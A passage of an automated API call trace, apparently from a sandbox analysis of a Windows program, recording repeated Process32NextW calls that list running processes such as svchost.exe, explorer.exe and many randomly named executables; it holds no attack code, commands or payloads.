hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.502] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.502] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.503] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.504] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0119.505] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.506] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.506] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0119.508] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.509] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0119.511] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0119.513] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0119.514] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0119.516] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.517] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0119.518] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0119.520] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0119.531] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0119.532] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0119.534] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0119.535] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0119.537] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0119.538] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0119.540] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0119.541] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0119.543] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0119.544] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0119.545] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0119.547] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0119.548] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0119.550] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0119.552] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0119.556] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0119.557] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0119.559] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0119.562] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.563] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0119.607] CloseHandle (hObject=0xc4) returned 1 [0119.607] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0119.614] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.615] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0119.616] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0119.617] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0119.618] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0119.618] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0119.619] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0119.620] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0119.621] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0119.622] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0119.623] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.624] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.626] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.627] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.628] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.628] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0119.629] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.630] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.631] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0119.633] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.634] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0119.636] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0119.637] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0119.639] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0119.640] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.685] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0119.686] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0119.687] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0119.689] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0119.690] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0119.692] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0119.694] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0119.695] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0119.696] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0119.697] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0119.698] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0119.699] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0119.701] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0119.702] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0119.703] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0119.704] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0119.706] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0119.707] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0119.709] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0119.710] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0119.712] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | 